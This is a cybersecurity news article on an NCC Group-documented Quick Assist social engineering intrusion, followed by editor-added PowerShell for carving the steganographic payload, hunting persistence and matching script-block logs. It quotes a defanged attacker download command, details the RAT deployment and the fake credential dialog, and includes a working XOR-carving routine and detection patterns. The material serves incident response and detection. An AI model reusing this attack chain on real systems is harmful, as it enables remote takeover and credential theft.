Categories: Cyber Security News

Hackers Use Social Engineering to Gain Remote Access in Under 5 Minutes

NCC Group’s Digital Forensics and Incident Response (DFIR) team has documented a sophisticated social engineering attack that demonstrates how quickly threat actors can compromise corporate systems, achieving full remote access and establishing persistence mechanisms in less than 300 seconds.

The incident involved impersonation of IT support personnel targeting approximately twenty users; two of them ultimately granted remote access through Quick Assist, the remote support tool built into Windows, which led to rapid deployment of offensive tooling and malware execution.

Lightning-Fast PowerShell Execution Chain

The attack sequence began once a user allowed remote access via Quick Assist: the operators immediately launched a series of PowerShell commands that carried out the whole compromise.

The initial payload executed (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard (in Windows PowerShell, curl is an alias for Invoke-WebRequest) to place attacker-controlled commands on the clipboard, followed by a more complex script that downloaded and executed further PowerShell code from hxxps://resutato[.]com/b2/tap.php?tap=.

The core malicious payload employed sophisticated steganographic techniques, embedding encrypted data within a seemingly innocent JPEG file downloaded from hxxps://resutato[.]com/b2/res/nh2.jpg.

The script utilized a four-byte marker (0x31, 0x67, 0xBE, 0xE1) to locate the encrypted payload within the image file, then performed XOR decryption using derived key material to extract a ZIP archive containing NetSupport Manager remote access tools.

The extracted files were deployed to C:\Users\{username}\AppData\Roaming\NetHealth, and the directory was given the hidden attribute to avoid casual discovery.
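The carving step described above, as an added example that is not code from the NCC Group report or from the attacker's script: it locates the four-byte marker named in the article inside an image file, XOR-decodes what follows it with a repeating key, and checks for a ZIP signature before writing anything out. The assumptions here are that the payload runs from the marker to end of file and that the key is a fixed byte string supplied by the caller (the article only says "derived key material"); the sample image, the key demo-key and the function names are constructed for this demo.

```powershell
# Added example, not code from the NCC Group report or the attacker's script.
# Marker bytes come from the article; key, layout and sample file are assumptions.

$NhMarker = [byte[]](0x31, 0x67, 0xBE, 0xE1)   # marker quoted in the article

function Find-ByteSequence {
    param([byte[]]$Data, [byte[]]$Pattern)
    # Plain linear scan; returns the offset of the first match, or -1.
    for ($i = 0; $i -le ($Data.Length - $Pattern.Length); $i++) {
        $hit = $true
        for ($j = 0; $j -lt $Pattern.Length; $j++) {
            if ($Data[$i + $j] -ne $Pattern[$j]) { $hit = $false; break }
        }
        if ($hit) { return $i }
    }
    return -1
}

function ConvertTo-XorBytes {
    param([byte[]]$Bytes, [byte[]]$Key)
    # Repeating-key XOR; the same call encodes and decodes.
    $out = New-Object byte[] $Bytes.Length
    for ($i = 0; $i -lt $Bytes.Length; $i++) {
        $out[$i] = $Bytes[$i] -bxor $Key[$i % $Key.Length]
    }
    return ,$out   # unary comma keeps the byte[] from being unrolled
}

function Export-HiddenZip {
    param([string]$ImagePath, [byte[]]$Key, [string]$OutPath)
    $data = [System.IO.File]::ReadAllBytes($ImagePath)
    $off  = Find-ByteSequence -Data $data -Pattern $NhMarker
    if ($off -lt 0) { Write-Warning "marker not found in $ImagePath"; return $null }
    $start = $off + $NhMarker.Length
    if ($start -ge $data.Length) { Write-Warning 'marker found but nothing follows it'; return $null }
    # Assumption: the encoded payload is everything after the marker.
    $cipher = New-Object byte[] ($data.Length - $start)
    [Array]::Copy($data, $start, $cipher, 0, $cipher.Length)
    $plain = ConvertTo-XorBytes -Bytes $cipher -Key $Key
    # Sanity check before writing: a ZIP begins with the local file header "PK\x03\x04".
    $zipSig = [byte[]](0x50, 0x4B, 0x03, 0x04)
    if ((Find-ByteSequence -Data $plain -Pattern $zipSig) -ne 0) {
        Write-Warning 'decoded data does not start with a ZIP signature: wrong key or wrong layout'
        return $null
    }
    [System.IO.File]::WriteAllBytes($OutPath, $plain)
    return $OutPath
}

# Constructed sample (not a real capture): a JPEG-like prefix, the marker, then a
# XOR-encoded stand-in for the ZIP archive.
$key     = [System.Text.Encoding]::ASCII.GetBytes('demo-key')   # assumed key for the demo only
$fakeZip = [byte[]](0x50, 0x4B, 0x03, 0x04) + [System.Text.Encoding]::ASCII.GetBytes('stand-in archive body')
$prefix  = [byte[]](0xFF, 0xD8, 0xFF, 0xE0) + [System.Text.Encoding]::ASCII.GetBytes('JFIF filler')
$blob    = [byte[]]($prefix + $NhMarker + (ConvertTo-XorBytes -Bytes $fakeZip -Key $key))
$sample  = Join-Path $env:TEMP 'nh2_sample.jpg'
[System.IO.File]::WriteAllBytes($sample, $blob)

Export-HiddenZip -ImagePath $sample -Key $key -OutPath (Join-Path $env:TEMP 'carved.zip')
```

The signature check is the part worth keeping when adapting this to a real sample: with the wrong key the XOR output is noise, and writing noise to disk and then trying to unzip it tells you nothing, whereas a failed "PK" check tells you immediately that the key derivation, not the marker search, needs another look.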

Multi-Layer Persistence and Credential Harvesting

Following successful payload deployment, the threat actors established multiple persistence mechanisms to ensure continued access to compromised systems.

They created a value named NetHealth under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run so that NetHealth.exe executes at each user logon, and at the same time registered a scheduled task named EventLogBackupTask configured to run every five minutes.
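A quick way to check a host for the two persistence mechanisms just described, plus the hidden AppData directory from the deployment step, as an added example that is not tooling from the NCC Group report: it lists HKCU Run values and flags those whose command lives under AppData, lists scheduled tasks whose trigger repeats at five minutes or less, and lists hidden directories under the roaming and local AppData folders. The five-minute threshold and the AppData path test are this editor's assumptions, not indicators published with the report.

```powershell
# Added example, not NCC Group's tooling. Thresholds and path tests are assumptions.

function Get-UserRunValues {
    $runKey = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    if (-not (Test-Path $runKey)) { return @() }
    $meta = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')   # provider metadata, not Run values
    $item = Get-ItemProperty -Path $runKey
    foreach ($prop in $item.PSObject.Properties) {
        if ($meta -contains $prop.Name) { continue }
        $cmd = [string]$prop.Value
        [pscustomobject]@{
            Name       = $prop.Name
            Command    = $cmd
            # Assumption: a Run entry executing from AppData deserves a look.
            Suspicious = [bool]($cmd -match '\\AppData\\(Roaming|Local)\\')
        }
    }
}

function Get-RepeatingScheduledTasks {
    param([int]$MaxIntervalMinutes = 5)
    foreach ($task in Get-ScheduledTask) {
        foreach ($trig in $task.Triggers) {
            $interval = $trig.Repetition.Interval      # ISO 8601 duration such as PT5M, or $null
            if (-not $interval) { continue }
            $span = [System.Xml.XmlConvert]::ToTimeSpan($interval)
            if ($span.TotalMinutes -le $MaxIntervalMinutes) {
                [pscustomobject]@{
                    TaskName = $task.TaskName
                    TaskPath = $task.TaskPath
                    Interval = $interval
                    Action   = (($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ').Trim()
                }
            }
        }
    }
}

function Get-HiddenAppDataDirs {
    # -Hidden returns only items that carry the Hidden attribute.
    foreach ($base in @($env:APPDATA, $env:LOCALAPPDATA)) {
        Get-ChildItem -Path $base -Directory -Hidden -ErrorAction SilentlyContinue |
            Select-Object FullName, CreationTime
    }
}

Get-UserRunValues | Where-Object Suspicious | Format-Table -AutoSize
Get-RepeatingScheduledTasks | Format-Table -AutoSize
Get-HiddenAppDataDirs | Format-Table -AutoSize
```

Run it in the context of the affected user, since both the Run key and %APPDATA% are per-user; Get-ScheduledTask is machine-wide and will also surface legitimate short-interval tasks, so the interval list is a starting point for review rather than a verdict.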

The attack culminated in the deployment of a credential harvesting script that built a fake authentication dialog with Windows Presentation Foundation (WPF) and XAML markup.

This GUI-based phishing component prompted users to re-enter their credentials under the guise of “System Credential Verification,” writing the captured credentials to C:\Users\{username}\AppData\Local\Temp\cred.txt.

The script even hid the Windows taskbar while the dialog was displayed, making the full-screen authentication prompt more convincing.
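Both the clipboard-staged download from the first stage and the WPF credential dialog described here leave recognisable text in PowerShell Script Block Logging (Event ID 4104), which is where a responder would hunt for this chain after the fact. The following added example, which is not NCC Group's detection logic, pattern-matches script block text for those stages; the regular expressions are this editor's assumptions about how each stage would appear, and the sample script blocks are constructed for the demo rather than recovered from the incident.

```powershell
# Added example, not NCC Group's detection content. The patterns below are assumptions
# about how the stages described on this page would look in 4104 ScriptBlockText.

$Indicators = [ordered]@{
    # Web fetch whose body is piped straight into the clipboard (curl/iwr/wget alias Invoke-WebRequest).
    ClipboardStaging   = '(curl|iwr|wget|Invoke-WebRequest)[^|\r\n]*\|\s*Set-Clipboard'
    # WPF loaded from PowerShell together with a PasswordBox in inline XAML (the fake dialog).
    WpfPasswordDialog  = 'PresentationFramework[\s\S]*?<PasswordBox'
    # Credentials written to a text file under Temp, as the article reports.
    TempCredentialDrop = '\\Temp\\cred\.txt'
    # A JPEG fetch followed by the four marker bytes from the steganography stage.
    ImageMarkerSearch  = '\.jpg[\s\S]*?0x31[\s,]*0x67[\s,]*0xBE[\s,]*0xE1'
}

function Test-ScriptBlockIndicators {
    param([string]$Text)
    # Returns the names of all indicators that match; -match is case-insensitive.
    $hits = New-Object System.Collections.Generic.List[string]
    foreach ($name in $Indicators.Keys) {
        if ($Text -match $Indicators[$name]) { $hits.Add($name) }
    }
    return ,$hits.ToArray()
}

function Search-ScriptBlockLog {
    param([int]$MaxEvents = 5000)
    # Requires Script Block Logging to be enabled on the host.
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value      # Properties[2] is ScriptBlockText
            $hits = Test-ScriptBlockIndicators -Text $text
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    TimeCreated = $_.TimeCreated
                    Indicators  = ($hits -join ', ')
                    Snippet     = $text.Substring(0, [Math]::Min(100, $text.Length))
                }
            }
        }
}

# Constructed samples, not recovered script blocks; the third one is benign.
$samples = @(
    '(curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard',
    'Add-Type -AssemblyName PresentationFramework; [xml]$x = "<Window><PasswordBox Name=''p''/></Window>"',
    'Get-Process | Sort-Object CPU -Descending | Select-Object -First 5'
)
foreach ($s in $samples) {
    $hits  = Test-ScriptBlockIndicators -Text $s
    $label = if ($hits.Count) { $hits -join ',' } else { 'no-match' }
    '{0,-20} {1}' -f $label, $s
}

# On a live host: Search-ScriptBlockLog | Format-Table -AutoSize
```

Script block logging records the de-obfuscated text of what actually ran, so a fetch that is staged through the clipboard and pasted into a second PowerShell session still shows up as a 4104 event in that second session; the first pattern catches the staging, and the others catch what the pasted content did next.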

This incident underscores the importance of user awareness training and rapid incident response: the chain from initial access to full control of the host took 167 seconds, showing how quickly a simple social engineering call can escalate into a complete endpoint compromise.


The post Hackers Use Social Engineering to Gain Remote Access in Under 5 Minutes appeared first on Cyber Security News.
